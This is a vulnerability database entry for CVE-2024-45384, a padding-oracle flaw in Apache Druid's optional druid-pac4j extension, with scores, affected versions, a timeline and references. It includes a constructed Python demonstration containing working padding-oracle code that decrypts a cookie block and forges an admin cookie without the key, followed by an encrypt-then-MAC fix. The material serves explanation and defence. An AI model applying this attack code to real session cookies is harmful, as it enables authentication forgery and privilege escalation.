VDB
CVE-2024-45384
PUBLISHED
CVSS 5.3 MEDIUM
Padding Oracle vulnerability in Apache Druid extension, druid-pac4j. This could allow an attacker to manipulate a pac4j session cookie. This issue affects Apache Druid versions 0.18.0 through 30.0.0. Since the druid-pac4j extension is optional and disabled by default, Druid installations not using the druid-pac4j extension are not affected by this vulnerability. While we are not aware of a way to meaningfully exploit this flaw, we nevertheless recommend upgrading to version 30.0.1 or higher which fixes the issue and ensuring you have a strong druid.auth.pac4j.cookiePassphrase as a precaution.
EPSS 0.22% · 44.1st percentile
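The description names the flaw class but not its mechanics. What follows is an added, constructed illustration and not code from Apache Druid, pac4j or the referenced fix commit: a CBC-mode, PKCS#7-padded cookie whose server-side check reveals whether unpadding failed, the byte-at-a-time padding-oracle attack that reads and then forges cookie contents without ever holding the key, and an encrypt-then-MAC check that removes the oracle. The 16-byte Feistel block cipher built on HMAC-SHA256, the cookie contents, and every function name (`accepts`, `recover_intermediate`, `forge_cookie`, `seal`, `open_sealed`, `demo`) are assumptions made for the example; the real extension's cipher, cookie layout and patched code are not reproduced here.

```python
# Added, constructed example (not Druid or pac4j code): CBC padding oracle on a session cookie.
import hashlib, hmac, secrets
BLOCK = 16  # block size in bytes; the attack does not depend on which block cipher is used

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))
def _round(key, i, half):  # keyed round function of a toy 4-round Feistel block cipher
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r
def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n
def pkcs7_unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, plaintext):
    prev = secrets.token_bytes(BLOCK)  # random IV, transmitted as the first block
    padded, out = pkcs7_pad(plaintext), [prev]
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)
def cbc_decrypt(key, ct):
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return pkcs7_unpad(b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:])))

def accepts(check, key, cookie):  # server verdict; with check=cbc_decrypt the only "no" is bad padding
    try:
        return check(key, cookie) is not None
    except ValueError:
        return False
def recover_intermediate(oracle, target):  # attacker side, key never used: recover D_k(target)
    inter = bytearray(BLOCK)                 # the block's value before the CBC XOR with its predecessor
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos                # padding byte we want the decryption to end with
        probe = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):  # bytes already recovered are forced to `pad`
            probe[j] = inter[j] ^ pad
        for guess in range(256):
            probe[pos] = guess
            if not oracle(bytes(probe) + target):
                continue
            if pos == BLOCK - 1:         # exclude an accidental 02 02 / 03 03 03 ... match
                probe[pos - 1] ^= 0xFF
                still_ok = oracle(bytes(probe) + target)
                probe[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle accepted nothing: no padding leak to exploit")
    return bytes(inter)

def forge_cookie(oracle, plaintext):  # build, last block first, a ciphertext that decrypts to `plaintext`
    padded, cur = pkcs7_pad(plaintext), secrets.token_bytes(BLOCK)
    out = [cur]                          # the final ciphertext block is arbitrary
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        cur = _xor(recover_intermediate(oracle, cur), padded[i:i + BLOCK])  # D_k(next) ^ wanted block
        out.insert(0, cur)
    return b"".join(out)

# Fix: encrypt-then-MAC, tag compared in constant time before any decryption, so tampered input never reaches unpadding.
def _tag(key, ct):                       # MAC key kept distinct from the encryption key
    return hmac.new(hashlib.sha256(b"cookie-mac" + key).digest(), ct, hashlib.sha256).digest()
def seal(key, plaintext):
    ct = cbc_encrypt(key, plaintext)
    return ct + _tag(key, ct)
def open_sealed(key, cookie):
    ct, tag = cookie[:-32], cookie[-32:]
    if not hmac.compare_digest(_tag(key, ct), tag):
        raise ValueError("bad tag")
    return cbc_decrypt(key, ct)

def demo():  # attack the padding-leaking check, then show the authenticated check yields nothing
    key = secrets.token_bytes(32)
    legit = cbc_encrypt(key, b"user=alice;role=viewer")   # constructed cookie contents
    oracle = lambda c: accepts(cbc_decrypt, key, c)
    forged = forge_cookie(oracle, b"user=alice;role=admin")
    try:
        recover_intermediate(lambda c: accepts(open_sealed, key, c), legit[BLOCK:2 * BLOCK])
        blocked = False
    except RuntimeError:
        blocked = True
    return {"first_block_read": _xor(recover_intermediate(oracle, legit[BLOCK:2 * BLOCK]), legit[:BLOCK]),
            "forged_decrypts_to": cbc_decrypt(key, forged), "attack_blocked_by_mac": blocked,
            "forged_passes_hardened_check": accepts(open_sealed, key, forged)}
```

`demo()` needs no key on the attacker side: the leaky check alone lets it read the first cookie block and mint a cookie carrying `role=admin`, while the same probes against `open_sealed` are all rejected identically and the attack makes no progress. The general lesson is that a cookie must be integrity-checked before anything about its decryption is observable; for the specific product the actions remain those in the advisory, upgrading to 30.0.1 or later and setting a strong `druid.auth.pac4j.cookiePassphrase`.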
Risk Scores
CVSS v3.1
5.3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
EPSS Score
0.22%
44.1st percentile
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Apache Software Foundation | Apache Druid | 0.18.0 through 30.0.0 (fixed in 30.0.1) |
| Maven | org.apache.druid.extensions:druid-pac4j | 0.18.0 through 30.0.0 (fixed in 30.0.1) |
| apache | druid | 0.18.0 through 30.0.0 (fixed in 30.0.1) |
Timeline
- Sep 17, 2024 CVE Published
- Sep 18, 2024 EPSS Score
- Oct 4, 2024 Coalition ESS Score
- Oct 8, 2024 EPSS Score
- Oct 27, 2024 EPSS Score
- Dec 6, 2024 EPSS Score
- Dec 26, 2024 EPSS Score
- Jan 14, 2025 EPSS Score
- Feb 3, 2025 EPSS Score
- Feb 22, 2025 EPSS Score
- Mar 14, 2025 CVE Updated
- Mar 17, 2025 EPSS Score
References
- https://lists.apache.org/thread/gr94fnp574plb50lsp8jw4smvgv1lbz1 vendor-advisory
- http://www.openwall.com/lists/oss-security/2024/09/17/1 url
- https://nvd.nist.gov/vuln/detail/CVE-2024-45384 advisory
- https://github.com/apache/druid/commit/74cab7a76c99da457c3a883939cc0b03301b8771 url
- https://github.com/apache/druid package
- https://github.com/apache/druid/releases/tag/druid-30.0.1 url